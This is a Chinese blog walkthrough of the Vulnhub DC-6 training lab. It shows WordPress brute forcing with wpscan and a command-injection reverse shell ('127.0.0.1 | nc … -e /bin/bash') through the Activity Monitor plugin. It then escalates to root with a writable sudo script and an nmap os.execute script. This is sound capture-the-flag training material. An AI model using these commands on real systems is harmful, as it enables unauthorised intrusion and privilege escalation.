Vulnhub靶场 | DC系列 | DC-6
DC-6
目录
环境搭建
- 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/
- 需要将靶机和 kali 攻击机放在同一个局域网里;
- 本实验kali 的 IP 地址:192.168.10.146。
渗透测试
使用 nmap 扫描 192.168.10.0/24 网段存活主机
┌──(root💀kali)-[~/桌面] └─# nmap -sP 192.168.10.0/24
经判断,目标主机IP地址为192.168.10.151。
扫描开放的服务。
┌──(root💀kali)-[~/桌面] └─# nmap -sS 192.168.10.151
扫描软件版本
┌──(root💀kali)-[~/桌面] └─# nmap -sV -p 22,80 192.168.10.151
直接访问web服务,访问不到,需要添加hosts记录
┌──(root💀kali)-[~/桌面] └─# vim /etc/hosts 192.168.10.151 wordy
┌──(root💀kali)-[~/桌面] └─# whatweb http://192.168.10.151
打开网站,并没有特别的地方。
网站为WordPress。
扫一下网站目录,也没有特别的目录。
换用dirb扫一下网站目录
┌──(root💀kali)-[~/桌面] └─# dirb http://wordy/
访问wp-admin,访问之后,出现了登录页。那么这里的思路就是使用暴力破解或者是SQL注入。
使用wordpress 的扫描工具wpscan扫一下
┌──(root💀kali)-[~/桌面] └─# wpscan --url http://wordy/ -e // -e 枚举
枚举出来5个用户,
admin graham sarah mark jens
以此来创建一个用户名字典
┌──(root💀kali)-[~/桌面] └─# vim wordy_user.txt
准备一个字典
┌──(root💀kali)-[~/桌面] └─# gzip -dk /usr/share/wordlists/rockyou.txt.gz ┌──(root💀kali)-[~/桌面] └─# ls /usr/share/wordlists/rockyou.txt /usr/share/wordlists/rockyou.txt
使用wpscan对目标进行暴力破解
┌──(root💀kali)-[~/桌面] └─# wpscan --url http://wordy/ -U wordy_user.txt -P /usr/share/wordlists/rockyou.txt
密码太多了,跑了3分多钟,才跑了0.01%
去DC-6的网站看看有什么提示线索。果然这里给出了线索,简化一下密码字典。
简化之后,重新跑一下吧~
┌──(root💀kali)-[~/桌面] └─# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt ┌──(root💀kali)-[~/桌面] └─# wpscan --url http://wordy/ -U wordy_user.txt -P passwords.txt --max-threads 100
顺利跑出一个用户名和密码
用户名:mark 密码:helpdesk01
登录一下后台~
发现安装了Activity Monitor插件
经测试,这里可以进行远程代码执行。
输出的结果
既然可以正常执行系统命令,那尝试一下反弹shell。
kali开启监听
wp执行以下命令,但是网页输入框有长度限制,需要修改一下前端代码~
127.0.0.1 | nc 192.168.10.146 4444 -e /bin/bash
成功反弹shell
先获得一个交互shell
貌似还有另外一个方式:在msf中搜索一下该activity monitor插件相关利用脚本
msf6 > search activity monitor
然后我们就可以进行一系列操作,比如看/etc/passwd
或者是/home
下的敏感信息,然后在/home/mark
发现了敏感信息,如下图,似乎是grahm
的密码GSo7isUM1D4。
切换用户成功
当然,也在jens家目录下发现一个.sh文件,
并且全显示都可以执行。
查看一下grahm
用户的sudo授权,发现可以无密码以jens用户来执行backup.sh文件。
查看一下grahm所属的组,发现在devs组,也就是说,可以往backups.sh中写内容(该文件对devs组有w权限)。
向该文件中写入“/bin/bash”,然后使用sudo -u jens
以jens用户运行该脚本,成功登录到jens。
graham@dc-6:~$ echo "/bin/bash" > /home/jens/backups.sh graham@dc-6:~$ sudo -u jens /home/jens/backups.sh jens@dc-6:/home/graham$
通过sudo -l 查看jens的授权
发现可以以root身份执行nmap命令。
所以可以使用nmap来提权。
jens@dc-6:/home/graham$ cd ~ jens@dc-6:~$ echo "os.execute('/bin/bash')" > shell jens@dc-6:~$ sudo nmap --script=shell
成功提权到root。
成功拿到flag:
🔗Reference:DC-6
本文来自博客园,作者:leyilea,转载请注明原文链接:https://www.cnblogs.com/leyilea/p/18300506
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 从HTTP原因短语缺失研究HTTP/2和HTTP/3的设计差异
· 三行代码完成国际化适配,妙~啊~